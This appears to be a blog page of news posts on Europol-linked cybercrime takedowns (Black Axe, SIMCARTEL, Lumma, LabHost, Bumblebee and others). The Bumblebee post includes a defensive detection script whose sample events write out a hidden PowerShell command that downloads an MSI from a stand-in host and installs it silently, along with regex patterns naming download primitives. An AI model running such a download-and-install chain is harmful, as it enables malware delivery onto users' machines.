Showing posts with label Europol.

Europol Cracks Down on Gang Responsible for Cyber Crime Worth Billions


Europol’s joint operation to crack down on an international gang

Europol recently arrested 34 people in Spain who are alleged to have a role in a global criminal gang called Black Axe. The operation was conducted by the Spanish National Police, the Bavarian State Criminal Police Office and Europol.

Twenty-eight individuals were arrested in Seville, three in Madrid, two in Malaga and one in Barcelona. Among the 34 suspects, 10 are from Nigeria.

“The action resulted in 34 arrests and significant disruptions to the group's activities. Black Axe is a highly structured, hierarchical group with its origins in Nigeria and a global presence in dozens of countries,” Europol said in a press release on its website. 

About Black Axe 

Black Axe is infamous for its role in various cyber crimes and other offences, including fraud, human trafficking, prostitution, drug trafficking, armed robbery, kidnapping, and malicious spiritual activities. The gang is estimated to earn billions of euros a year from these operations, which have a massive impact.

Officials suspect that Black Axe is responsible for fraud worth over 5.94 million euros. During the operation, the investigating agencies froze 119,352 euros in bank accounts and seized 66,403 euros in cash during home searches.

The crackdown 

Germany and Spain's cross-border cooperation includes the deployment of two German officers on the scene on the day of action, the exchange of intelligence, and the provision of analytical support to Spanish investigators. 

The core group of the organized crime network, which recruits money mules in underprivileged communities with high unemployment rates, was the objective of the operation. The majority of these susceptible people are of Spanish nationality and are used to support the illegal activities of the network.

Europol's key role

Europol provided a variety of services to help this operation, such as intelligence analysis, a data sprint in Madrid, and on-the-spot assistance. Mapping the organization's structure across nations, centralizing data, exchanging important intelligence packages, and assisting with coordinated national investigations have all been made possible by Europol. 

This strategy seeks to disrupt the group's operations and recover assets, addressing the problems caused by the group's many small, scattered cases, its cross-border activities, and the blurring of its crimes into "ordinary" local offences.



Europol Dismantles SIMCARTEL Network Behind Global Phishing and SIM Box Fraud Scheme

 

Europol has taken down a vast international cybercrime network responsible for orchestrating large-scale phishing, fraud, and identity theft operations through mobile network systems. The coordinated crackdown, codenamed “SIMCARTEL,” led to multiple arrests and the seizure of a massive infrastructure used to fuel telecom-based criminal activity across more than 80 countries. 

Investigators from Austria, Estonia, and Latvia spearheaded the probe, linking the criminal network to over 3,200 cases of fraud, including fake investment scams and emergency call frauds designed for quick financial gain. The financial toll of the operation reached approximately $5.3 million in Austria and $490,000 in Latvia, highlighting the global scale of the scheme. 

The coordinated action, conducted primarily on October 10 in Latvia, resulted in the arrest of seven suspects and the seizure of 1,200 SIM box devices loaded with nearly 40,000 active SIM cards. Authorities also discovered hundreds of thousands of unused SIM cards, along with five servers, two websites, and several luxury vehicles. Around $833,000 in funds across bank and cryptocurrency accounts was also frozen during the operation.

According to Europol, the infrastructure was designed to mask the true identities and locations of perpetrators, allowing them to create fake social media and communication accounts for cybercrimes. “The network enabled criminals to establish fraudulent online profiles that concealed their real identity and were then used to carry out phishing and financial scams,” Europol said in a statement. 

Investigators have traced the network to over 49 million fake accounts believed to have been created and distributed by the suspects. These accounts were used in a range of crimes, including extortion, smuggling, and online marketplace scams, as well as fake investment and e-commerce schemes. 

The operation highlights the growing global threat of SIM farms—collections of SIM boxes that allow cybercriminals to automate scams, send spam, and commit fraud while remaining undetected by telecom providers. These systems have become a preferred tool for large-scale phishing and social engineering attacks worldwide. 

Just weeks earlier, the U.S. Secret Service dismantled a similar network in New York City, seizing over 300 servers and 100,000 SIM cards spread across several locations. 

Cybersecurity intelligence firm Unit 221B also issued a warning that SIM farms are rapidly multiplying and putting telecom providers, banks, and consumers at risk. “We’ve identified at least 200 SIM boxes operating across dozens of U.S. sites,” said Ben Coon, Chief Intelligence Officer at Unit 221B. 

While the SIMCARTEL takedown marks a major victory for law enforcement, Europol noted that investigations are still underway to uncover the full extent of the criminal infrastructure. Authorities emphasize that combating SIM box networks is essential to defending users against phishing, identity fraud, and telecom-based cyberattacks that continue to grow in sophistication and scale.

Canadian Police Seize $40M in Digital Assets After Closing TradeOgre

 


Canadian police have shut down the cryptocurrency trading platform TradeOgre and seized digital assets valued at more than $40 million USD, marking both the country’s largest cryptocurrency seizure and the first time a crypto exchange has been dismantled by national law enforcement.


A Platform Built on Anonymity

TradeOgre was a small but notable exchange that allowed users to trade niche digital currencies, including Monero, which is popular for its privacy features. The platform stood out for avoiding Know Your Customer (KYC) checks, meaning people could open accounts without providing identification. According to the Royal Canadian Mounted Police (RCMP), TradeOgre also failed to register as a money services business with FINTRAC, Canada’s financial watchdog. These gaps made the exchange appealing to those seeking anonymity but also raised red flags for regulators.

The case began in June 2024, when Canada’s Money Laundering Investigative Team (MLIT) opened a probe after receiving intelligence from Europol. Investigators relied on blockchain tracing tools to track wallet activity linked to the platform. In July 2024, TradeOgre suddenly went offline without any announcement from its operators, fueling rumors among users that it had carried out an “exit scam.” Authorities later confirmed that the takedown was part of their enforcement action.


Why Authorities Took Action

The RCMP said TradeOgre was operating illegally in Canada because it was unregistered and allowed anonymous trading. Investigators suspect the site was used by criminals to launder illicit funds, taking advantage of Monero and other privacy-focused coins. However, officials stressed that not all customer funds were necessarily linked to crime.

In a statement, the RCMP clarified that they could not confirm whether the seized assets came from specific crimes such as extortion. They also noted that details about the exact sources of the money could not be released at this stage.


Fallout and Reactions

The sudden seizure left many users cut off from their funds. Some, including well-known crypto community members like Taylor Monahan of MetaMask, criticized the move, arguing that innocent users had their assets frozen without warning. “Very much looking forward to seeing the evidence… and for you to provide recourse to ALL innocent parties,” Monahan wrote on social media.

The RCMP responded that individuals who believe their funds were legitimate may seek remedies through the Canadian court system if the assets are subject to forfeiture proceedings. The agency added that any inquiries about the seized cryptocurrency should be directed to the MLIT.


A Warning for Crypto Users

Authorities emphasized that this case shows the risks of using unregulated exchanges. While anonymity may appeal to some traders, platforms that avoid oversight expose customers to legal uncertainty, sudden shutdowns, and loss of access to funds.



Global Operation Dismantles Lumma Malware Network, Seizes 2,300 Domains and Infrastructure

 

In a sweeping international crackdown earlier this month, a collaborative operation involving major tech firms and law enforcement agencies significantly disrupted the Lumma malware-as-a-service (MaaS) operation. This effort resulted in the seizure of thousands of domains and dismantling of key components of Lumma's infrastructure across the globe.

A major milestone in the operation occurred on May 13, 2025, when Microsoft, through legal action, successfully took control of around 2,300 domains associated with the malware. Simultaneously, the U.S. Department of Justice (DOJ) dismantled online marketplaces used by cybercriminals to rent Lumma’s services, while Europol’s European Cybercrime Centre (EC3) and Japan’s Cybercrime Control Center (JC3) helped take down Lumma’s infrastructure in their respective regions.

"Between March 16, 2025, and May 16, 2025, Microsoft identified over 394,000 Windows computers globally infected by the Lumma malware. Working with law enforcement and industry partners, we have severed communications between the malicious tool and victims," said Steven Masada, Assistant General Counsel of Microsoft's Digital Crimes Unit.

Cloudflare, one of the key players in the effort, highlighted the impact of the takedown.

“The Lumma Stealer disruption effort denies the Lumma operators access to their control panel, marketplace of stolen data, and the Internet infrastructure used to facilitate the collection and management of that data. These actions impose operational and financial costs on both the Lumma operators and their customers, forcing them to rebuild their services on alternative infrastructure,” Cloudflare stated.

The operation saw contributions from companies like ESET, CleanDNS, Bitsight, Lumen, GMO Registry, and law firm Orrick. According to Cloudflare, the Lumma malware misused its platform to mask the IP addresses of the servers used to siphon off stolen credentials and sensitive data.

Even after suspending malicious domains, the malware managed to bypass Cloudflare’s interstitial warning page, prompting the company to reinforce its security measures.

"Cloudflare's Trust and Safety team repeatedly flagged domains used by the criminals and suspended their accounts," the company explained.

“In February 2025, Lumma’s malware was observed bypassing Cloudflare’s interstitial warning page, which is one countermeasure that Cloudflare employs to disrupt malicious actors. In response, Cloudflare added the Turnstile service to the interstitial warning page, so the malware could not bypass it.”

Also known as LummaC2, Lumma is a sophisticated information-stealing malware offered as a subscription-based service, ranging from $250 to $1,000. It targets both Windows and macOS systems, enabling cybercriminals to exfiltrate data from browsers and apps.

Once installed, Lumma can extract a broad range of data, including login credentials, credit card numbers, cryptocurrency wallets, cookies, and browsing history from popular browsers like Google Chrome, Microsoft Edge, Mozilla Firefox, and other Chromium-based platforms. The stolen data is packaged and sent to attacker-controlled servers, where it is either sold on dark web marketplaces or used in follow-up cyberattacks.

Initially spotted in December 2022 on cybercrime forums, the malware quickly gained traction. Cybersecurity firm KELA reported its rapid rise in popularity among cybercriminals.

IBM X-Force’s 2025 threat intelligence report revealed a 12% year-on-year increase in the number of stolen credentials being sold online, largely driven by the use of infostealers like Lumma. Phishing campaigns delivering such malware have surged by 84%, making Lumma the most dominant player in this threat landscape.

Lumma has been linked to major malvertising campaigns affecting hundreds of thousands of users and has been used by notorious groups such as the Scattered Spider cybercrime collective.

Recently, stolen data linked to Lumma has played a role in high-profile breaches at companies like PowerSchool, HotTopic, CircleCI, and Snowflake. In some cases, infostealer malware has been used to manipulate internet infrastructure, such as the Orange Spain RIPE account hijacking incident that disrupted BGP and RPKI configurations.

On the day of the crackdown, the FBI and CISA jointly issued a security advisory outlining indicators of compromise (IOCs) and detailing the tactics, techniques, and procedures (TTPs) employed by threat actors using Lumma malware.


Global Cybercrime Crackdown Dismantles Major Phishing-as-a-Service Platform ‘LabHost’

 

In a major international crackdown, a law enforcement operation spearheaded by the London Metropolitan Police and coordinated by Europol has successfully taken down LabHost, one of the most notorious phishing-as-a-service (PhaaS) platforms used by cybercriminals worldwide.

Between April 14 and April 17, 2024, authorities carried out synchronized raids across 70 different sites globally, resulting in the arrest of 37 individuals. Among those arrested were four suspects in the UK believed to be the platform’s original creators and administrators. Following the arrests, LabHost’s digital infrastructure was completely dismantled.

LabHost had gained infamy for its ease of use and wide accessibility, making it a go-to cybercrime tool. The service offered more than 170 fake website templates imitating trusted brands from the banking, telecom, and logistics sectors—allowing users to craft convincing phishing campaigns with minimal effort.

According to authorities, LabHost supported over 40,000 phishing domains and catered to approximately 10,000 users across the globe. The coordinated enforcement effort was supported by Europol’s European Cybercrime Centre (EC3) and the Joint Cybercrime Action Taskforce (J-CAT), with 19 countries actively participating in the investigation.

LabHost showcased how cybercrime has become industrialized through subscription-based platforms. For a monthly fee of around $249, subscribers could access phishing kits, fraudulent websites, hosting services, and even tools to interact with victims in real-time.

One of its most dangerous features was LabRat, an integrated dashboard that enabled users to monitor ongoing phishing attacks. This tool also allowed cybercriminals to intercept two-factor authentication codes and login credentials, effectively bypassing modern security measures.

Its user-friendly interface eliminated the need for technical skills—opening the door for anyone with malicious intent and a credit card to launch sophisticated phishing schemes. The platform's popularity contributed to a spike in identity theft, financial fraud, and widespread data breaches.

Authorities hailed the takedown as a milestone in the fight against cybercrime. However, they also cautioned that the commoditization of cybercrime remains a serious concern.

"This is a critical blow to phishing infrastructure," cybersecurity experts said, "but the ease of recreating similar platforms continues to pose a major threat."

Following the seizure of LabHost’s backend systems, law enforcement agencies have begun analyzing the data to identify the perpetrators and their victims. This will mark the beginning of a new wave of investigations and preventative measures.

The operation involved agencies from 19 countries, including the FBI and Secret Service from the United States, as well as cybercrime units in Canada, Germany, the Netherlands, Poland, Spain, Australia, and the UK. This unprecedented level of international cooperation highlights the cross-border nature of cyber threats and the importance of unified global action.

As authorities prepare for a fresh wave of prosecutions, the LabHost takedown stands as a defining moment in cyber law enforcement—both in its impact and its symbolism.

AI Technology is Helping Criminal Groups Grow Stronger in Europe, Europol Warns

 



The European Union’s main police agency, Europol, has raised an alarm about how artificial intelligence (AI) is now being misused by criminal groups. According to their latest report, criminals are using AI to carry out serious crimes like drug dealing, human trafficking, online scams, money laundering, and cyberattacks.

This report is based on information gathered from police forces across all 27 European Union countries. Released every four years, it helps guide how the EU tackles organized crime. Europol’s chief, Catherine De Bolle, said cybercrime is growing more dangerous as criminals use advanced digital tools. She explained that AI is giving criminals more power, allowing them to launch precise and damaging attacks on people, companies, and even governments.

Some crimes, she noted, are not just about making money. In certain cases, these actions are also designed to cause unrest and weaken countries. The report explains that criminal groups are now working closely with some governments to secretly carry out harmful activities.

One growing concern is the rise in harmful online content, especially material involving children. AI is making it harder to track and identify those responsible because fake images and videos look very real. This is making the job of investigators much more challenging.

The report also highlights how criminals are now able to trick people using technology like voice imitation and deepfake videos. These tools allow scammers to pretend to be someone else, steal identities, and threaten people. Such methods make fraud, blackmail, and online theft harder to spot.

Another serious issue is that countries are now using criminal networks to launch cyberattacks against their rivals. Europol noted that many of these attacks are aimed at important services like hospitals or government departments. For example, a hospital in Poland was recently hit by a cyberattack that forced it to shut down for several hours. Officials said the use of AI made this attack more severe.

The report warns that new technology is speeding up illegal activities. Criminals can now carry out their plans faster, reach more people, and operate in more complex ways. Europol urged countries to act quickly to tackle this growing threat.

The European Commission is planning to introduce a new security policy soon. Magnus Brunner, the EU official in charge of internal affairs, said Europe needs to stay alert and improve safety measures. He also promised that Europol will get more staff and better resources in the coming years to fight these threats.

In the end, the report makes it clear that AI is making crime more dangerous and harder to stop. Stronger cooperation between countries and better cyber defenses will be necessary to protect people and maintain safety across Europe.

Cybercrime Network Busted: Turning Airbnbs Into Fraud Centers

 


An international cybercrime network responsible for stealing millions of euros has been dismantled in a joint operation conducted in Belgium and the Netherlands. The Europol-coordinated effort led to eight arrests and 17 coordinated raids across the two countries on December 3.

Investigation and Arrests

The investigation, which began in 2022, targeted a gang involved in phishing, online fraud, and money laundering. Four suspects—three men and one woman, aged between 23 and 66—were arrested in the Netherlands. They face charges of participating in a criminal organization.

Authorities seized various pieces of evidence during the raids, including mobile phones, data storage devices, significant amounts of cash, and luxury items purchased with stolen funds. These findings underscored the extensive fraudulent activities conducted by the group.

Airbnbs: Temporary Bases for Cybercrime

The gang used rented Airbnb properties and luxury apartments as temporary call centers to avoid detection. Operating from these locations, they launched phishing attacks targeting victims across Europe. Communication methods included emails, text messages, and WhatsApp messages, in which they impersonated bank representatives or fraud prevention agents.

Victims were informed that their bank accounts had been compromised and were directed to fake banking websites designed to appear legitimate. Once victims entered sensitive information such as login credentials or PINs, the attackers swiftly accessed their accounts and withdrew funds. In some cases, unsuccessful fraud attempts led to verbal harassment, adding emotional distress to the victims’ financial losses.

Spending Details

Rather than keeping a low profile, the gang openly flaunted their stolen wealth online. They spent lavishly on luxury vacations, designer clothes, high-end cars, and exclusive parties. Their social media profiles featured images showcasing expensive purchases and interactions with celebrities, further exposing their illegal activities.

How to Avoid Phishing Scams

Phishing scams remain one of the most common tactics used by cybercriminals. To protect yourself:

  1. Treat unsolicited calls, messages, and emails with suspicion, especially if they request sensitive information.
  2. Avoid clicking on suspicious links. Instead, verify claims by contacting your bank directly through official channels.
  3. Be cautious of small demands for money on second-hand sales websites; these may be attempts to steal card information.

Impact

Europol highlights that phishing tactics are constantly evolving, making them harder to trace. This case underscores the importance of vigilance and staying informed about online threats. As cybercrime becomes more sophisticated, individuals must take proactive steps to secure their personal and financial data.

The success of this operation demonstrates the critical role of international collaboration in combating cybercrime. It serves as a powerful reminder of the ongoing need for cooperation between law enforcement agencies to effectively counter global threats.

Bumblebee Malware Resurfaces in New Attacks Following Europol Crackdown

 

The Bumblebee malware loader, inactive since Europol's 'Operation Endgame' in May, has recently resurfaced in new cyberattacks. This malware, believed to have been developed by the TrickBot creators, first appeared in 2022 as a successor to the BazarLoader backdoor, giving ransomware groups access to victim networks.

Bumblebee spreads through phishing campaigns, malvertising, and SEO poisoning, often disguised as legitimate software such as Zoom, Cisco AnyConnect, ChatGPT, and Citrix Workspace. Among the dangerous payloads it delivers are Cobalt Strike beacons, data-stealing malware, and ransomware.

Operation Endgame was a large-scale law enforcement effort that targeted and dismantled over a hundred servers supporting various malware loaders, including IcedID, Pikabot, TrickBot, Bumblebee, and more. Following this, Bumblebee activity appeared to cease. However, cybersecurity experts at Netskope have recently detected new instances of the malware, hinting at a possible resurgence.

The latest Bumblebee attack involves a phishing email that tricks recipients into downloading a malicious ZIP file. Inside is a .LNK shortcut that activates PowerShell to download a harmful MSI file disguised as an NVIDIA driver update or Midjourney installer.

This MSI file is executed silently, and Bumblebee uses it to deploy itself in the system's memory. The malware uses a DLL unpacking process to establish itself, showing configuration extraction methods similar to previous versions. The encryption key "NEW_BLACK" was identified in recent attacks, along with two campaign IDs: "msi" and "lnk001."
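The delivery chain described above (ZIP from a phishing email, a .LNK that launches PowerShell, PowerShell fetching an MSI, and a silent MSI install) leaves a recognisable trail in process-creation telemetry. The script below is an added example of how a defender might score such events; it is not code from Netskope or from the original post. The key=value log format, the host names and the `update-example.invalid` domain are all constructed for the example, and the `Temp1_<archive>.zip` working-directory check relies on the Windows Explorer behaviour of extracting a file opened directly from a ZIP into a folder of that name under %TEMP%, which is used here as a heuristic.

```python
"""
Heuristic scoring of process-creation events for the LNK -> PowerShell -> MSI
loader chain. The event format and the sample events are constructed for this
example (an assumed key=value export, roughly what an EDR or Sysmon Event ID 1
feed looks like); they are not from the original post.
"""
import re

# Constructed sample events: the first two mimic the described chain on host
# WS01, the last two are benign look-alikes that the rules must not flag.
SAMPLE_EVENTS = [
    'ts=2024-10-21T09:12:01Z host=WS01 parent=explorer.exe image=powershell.exe '
    'cmd="powershell.exe -w hidden -c Invoke-WebRequest http://update-example.invalid/nvidia.msi '
    '-OutFile $env:TEMP\\nvidia.msi; Start-Process msiexec -ArgumentList \'/i $env:TEMP\\nvidia.msi /qn\'" '
    'cwd="C:\\Users\\alice\\AppData\\Local\\Temp\\Temp1_invoice.zip\\"',
    'ts=2024-10-21T09:12:03Z host=WS01 parent=powershell.exe image=msiexec.exe '
    'cmd="msiexec /i C:\\Users\\alice\\AppData\\Local\\Temp\\nvidia.msi /qn"',
    'ts=2024-10-21T09:30:44Z host=WS02 parent=explorer.exe image=powershell.exe '
    'cmd="powershell.exe -File C:\\scripts\\backup.ps1" cwd="C:\\scripts\\"',
    'ts=2024-10-21T10:02:10Z host=WS03 parent=services.exe image=msiexec.exe '
    'cmd="msiexec /i C:\\deploy\\agent.msi /qn"',
]

# key=value pairs; a value is either a double-quoted string or a bare token.
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
# Download primitives commonly seen in PowerShell one-liners.
DOWNLOAD_RE = re.compile(
    r"(Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b|DownloadFile|DownloadString|Start-BitsTransfer)",
    re.I,
)
MSI_RE = re.compile(r"\.msi\b", re.I)
# msiexec quiet/unattended switches.
QUIET_RE = re.compile(r"(?:^|\s)/(?:qn|q|quiet)\b", re.I)
# Heuristic: Explorer extracts a file opened from inside a ZIP to %TEMP%\Temp1_<name>.zip\
ZIP_TEMP_RE = re.compile(r"\\Temp1_[^\\]+\.zip\\", re.I)


def parse_event(line):
    """Turn one key=value log line into a dict, stripping surrounding quotes."""
    return {m.group(1): m.group(2).strip('"') for m in KV_RE.finditer(line)}


def score_event(ev):
    """Return the list of indicators matched by a single parsed event."""
    reasons = []
    image = ev.get("image", "").lower()
    parent = ev.get("parent", "").lower()
    cmd = ev.get("cmd", "")
    cwd = ev.get("cwd", "")

    # Stage 1: a user double-clicking a .lnk gives explorer.exe as the parent of powershell.exe.
    if image == "powershell.exe" and parent == "explorer.exe":
        if DOWNLOAD_RE.search(cmd):
            reasons.append("explorer->powershell with a download primitive")
        if MSI_RE.search(cmd):
            reasons.append("powershell command line references an .msi")
        if "-w hidden" in cmd.lower() or "windowstyle hidden" in cmd.lower():
            reasons.append("hidden PowerShell window")
        if ZIP_TEMP_RE.search(cwd):
            reasons.append("working directory is an Explorer ZIP extraction folder")

    # Stage 2: silent MSI install launched by PowerShell, or installing from Temp.
    if image == "msiexec.exe" and QUIET_RE.search(cmd):
        if parent == "powershell.exe":
            reasons.append("silent msiexec spawned by powershell")
        if re.search(r"\\Temp\\", cmd, re.I):
            reasons.append("silent msiexec installing a package from Temp")
    return reasons


def find_suspicious(lines, min_reasons=2):
    """Return (event, reasons) for every event that matches at least min_reasons indicators."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        reasons = score_event(ev)
        if len(reasons) >= min_reasons:
            hits.append((ev, reasons))
    return hits


if __name__ == "__main__":
    for ev, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"{ev['ts']} {ev['host']} {ev['image']}: " + "; ".join(reasons))
```

Requiring two independent indicators per event keeps a lone `msiexec /qn` from a software-deployment service (the WS03 event) or a scheduled PowerShell script (WS02) out of the alert list, while both stages of the loader chain on WS01 are flagged; in a real deployment the two stages would additionally be correlated by host and time window.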

Although Netskope hasn't shared details about the payloads Bumblebee is currently deploying, the new activity signals the malware’s possible return. A full list of indicators of compromise can be found on a related GitHub repository.